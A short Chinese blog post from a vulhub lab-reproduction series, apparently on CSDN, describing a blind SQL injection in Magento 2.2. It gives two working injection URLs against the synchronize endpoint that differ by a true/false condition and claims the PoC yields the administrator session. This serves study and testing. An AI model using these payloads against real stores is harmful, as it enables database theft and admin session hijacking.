Magento 2.2 SQL注入漏洞

小白萝卜

于 2021-07-12 09:36:06 发布

阅读量338

点赞数

分类专栏： vulhub漏洞复现文章标签：安全 sql session

本文链接：https://blog.csdn.net/EC_Carrot/article/details/118668000

版权

178 篇文章 29 订阅

订阅专栏

该注入漏洞为盲注，区分在返回的HTTP状态码，如分别访问以下两个网址：

http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d0)+--+-
http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d1)+--+-

在这里插入图片描述

在这里插入图片描述
我们使用Poc就能够获取管理员的session

关注

专栏目录